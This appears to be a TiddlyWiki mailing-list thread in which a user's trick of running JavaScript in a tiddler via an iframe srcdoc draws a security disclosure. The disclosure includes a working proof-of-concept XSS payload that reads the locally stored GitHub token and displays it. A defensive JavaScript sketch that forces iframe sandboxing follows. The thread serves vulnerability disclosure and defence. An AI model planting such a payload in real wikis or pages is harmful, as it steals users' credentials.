This seems EXTREMELY INSECURE. What is to stop an attacker from injecting 
malicious JS into a tiddler, regardless of whether it is "sandboxed"?
Paste this proof-of-concept into a blank tiddler. What it does is steal 
your GitHub PAT, if you have one configured, and alert it to you. While I 
have not done it here, I could easily make it both invisible and have it 
email me the PATs it gathers.

CODE:
<$vars vSrcDoc={{{ [[<body> <div id="clockDiv"></div><script>document.getElementById('clockDiv').innerHTML = `<a id="xss" href="javascript:alert('Your GitHub Token is:'+localStorage.getItem('tw5-password-github')+'. If it is blank, you probably don\\'t have TW GitHub saving configured');"></a>`; document.getElementById('xss').click();</script></body>]] }}}>
<iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>
</$vars>

Long story short, an attacker can easily bypass any sanitization TW employs 
and harvest credentials from various sites. It is my belief that this issue 
needs to be fixed immediately and brought to the attention of Jeremy and 
other devs.

I would be happy to help with the repair process. I have some experience with 
pentesting and fixing XSS vulnerabilities (mainly in my own applications). 
I would recommend adding a listener to TW changes and checking for iframe 
code. If it does contain this, TW should add a sandbox constraint on it 
(https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox).

On Monday, August 16, 2021 at 10:55:46 AM UTC-4 cj.v...@gmail.com wrote:

> Updated one of the tiddlers in the JSON package.  New version attached.
>
> The addition highlighted below:
>
> <body>
>   <div id="clockDiv"></div>
>   <script>
> *document.oncontextmenu = function() { *
> *    return false; *
> *};*
>     let clockEl = document.getElementById("clockDiv");
> ...
>
> The reason for the added code:  block access to the back button in the 
> iFrame (by blocking access to the entire menu), which winds up performing 
> the back button operation on the entire browser page.
>
> On Sunday, August 15, 2021 at 11:27:41 PM UTC-3 Charlie Veniot wrote:
>
>> I don't know what made me think of this.
>>
>> In case this has not been brought up in a while (I doubt this is new to 
>> seasoned folk) ...
>>
>> I was thinking: could I use an iFrame to include simple javascript in a 
>> tiddler without getting into macros or plugins that enable javascript.
>>
>> And, if I could, then could I set things up so that the iFrame is showing 
>> javascript dynamically created by the tiddler ?
>>
>> So here is a way to show a digital clock in TiddlyWiki, for 
>> non-programmers who just want to copy and paste javascript code from the 
>> web without figuring out how the javascript code works :
>>
>> Put this in a brand new tiddler:
>>
>> <$vars vSrcDoc={{{ [[<body>  <div id="clockDiv"></div>  <script>    let clockEl = document.getElementById("clockDiv");    function getClockTime() {      let date = new Date();      let hr = date.getHours();      let min = date.getMinutes();      let sec = date.getSeconds();      hr = ("0" + hr).slice(-2);      min = ("0" + min).slice(-2);      sec = ("0" + sec).slice(-2);      clockEl.innerHTML = `${hr}:${min}:${sec}`;    }    setInterval(getClockTime, 1000);  </script></body>]] }}}>
>> <iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>
>> </$vars>
>>
>> Sneaky sneaky, has me wondering what kind of other fun things could be 
>> done...
>>
>

-- 
You received this message because you are subscribed to the Google Groups 
"TiddlyWiki" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to tiddlywiki+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/tiddlywiki/849648f9-ac4b-4722-a6da-184939f02a7an%40googlegroups.com.
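The mitigation the poster suggests above (detect iframe markup and force a sandbox constraint onto it) can be sketched in plain JavaScript. The block below is an added example, not code from the thread and not TiddlyWiki's own code: it takes rendered HTML (attribute values already quoted, not raw wikitext with `<<macro>>` attributes), finds every `<iframe>` start tag, and replaces whatever `sandbox` attribute it carries with one reduced to a permitted set of tokens. The permitted set, the default of `allow-scripts`, and the sample HTML are assumptions made for this example. The reason `allow-same-origin` is never granted is the mechanism behind the proof-of-concept: a `srcdoc` frame without a sandbox shares the wiki's origin and therefore its `localStorage`, whereas a sandboxed frame without `allow-same-origin` runs in an opaque origin, so the clock-style script still runs but `localStorage` of the wiki is not reachable from it.

```javascript
'use strict';
// Added example (not TiddlyWiki code): rewrite rendered HTML so that every
// <iframe> start tag carries a restrictive sandbox attribute. Input is
// rendered HTML (attribute values quoted), not raw wikitext.

// Sandbox tokens the wiki is willing to grant (an assumption made for this
// example). 'allow-same-origin' is deliberately absent: without it the frame
// gets an opaque origin, so the wiki's localStorage is not reachable from
// inside the frame, while a plain clock script keeps working under
// 'allow-scripts'.
const PERMITTED_TOKENS = new Set(['allow-scripts', 'allow-forms', 'allow-popups']);
// Applied when the tiddler author gave no sandbox attribute at all.
const DEFAULT_SANDBOX = 'allow-scripts';

// Reduce a requested sandbox value to the tokens the policy permits.
function computeSandbox(requested) {
  if (requested === undefined) return DEFAULT_SANDBOX;
  return requested
    .split(/\s+/)
    .filter((t) => t && PERMITTED_TOKENS.has(t.toLowerCase()))
    .join(' ');
}

// Index of the '>' that closes a start tag, skipping '>' inside quoted
// attribute values (srcdoc values are full of them). -1 if unterminated.
function findTagEnd(html, from) {
  let quote = null;
  for (let i = from; i < html.length; i++) {
    const ch = html[i];
    if (quote) {
      if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") {
      quote = ch;
    } else if (ch === '>') {
      return i;
    }
  }
  return -1;
}

// Attribute scanner for the text between '<iframe' and '>':
// name, name=unquoted, name="..." or name='...'.
const ATTR_RE = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;

// Rewrite every <iframe> start tag in `html` with a policy-conforming
// sandbox attribute; all other attributes are kept as written.
function hardenIframes(html) {
  const tagRe = /<iframe(?=[\s\/>])/gi;
  let out = '';
  let pos = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tagStart = m.index;
    const attrStart = tagStart + m[0].length;
    const end = findTagEnd(html, attrStart);
    if (end === -1) break; // unterminated tag: leave the tail untouched
    let attrText = html.slice(attrStart, end);
    let selfClosing = false;
    if (/\/\s*$/.test(attrText)) {
      selfClosing = true;
      attrText = attrText.replace(/\/\s*$/, '');
    }
    const kept = [];
    let requested; // stays undefined when the author wrote no sandbox attribute
    ATTR_RE.lastIndex = 0;
    let a;
    while ((a = ATTR_RE.exec(attrText)) !== null) {
      const name = a[1];
      const value = a[2] ?? a[3] ?? a[4];
      if (name.toLowerCase() === 'sandbox') {
        requested = value ?? '';
        continue;
      }
      kept.push(value === undefined ? name : `${name}="${value.replace(/"/g, '&quot;')}"`);
    }
    kept.push(`sandbox="${computeSandbox(requested)}"`);
    out += html.slice(pos, tagStart) + `<iframe ${kept.join(' ')}${selfClosing ? ' /' : ''}>`;
    pos = end + 1;
    tagRe.lastIndex = pos;
  }
  return out + html.slice(pos);
}

// Constructed sample: a srcdoc frame like the clock tiddler, plus one that
// asks for allow-same-origin.
const SAMPLE_HTML =
  '<p>clock:</p><iframe srcdoc="<body><div id=clockDiv></div></body>" style="border:none;width:100%;"></iframe>' +
  '<iframe sandbox="allow-scripts allow-same-origin" src="other.html"></iframe>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(hardenIframes(SAMPLE_HTML));
}
```

The same policy applied at the DOM level is one `setAttribute('sandbox', computeSandbox(el.getAttribute('sandbox') ?? undefined))` per iframe element when the tiddler is rendered; the string form here exists so the logic can be exercised outside a browser. Note that `allow-scripts` together with `allow-same-origin` would let framed content remove its own sandbox, which is the second reason the example never grants the latter.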
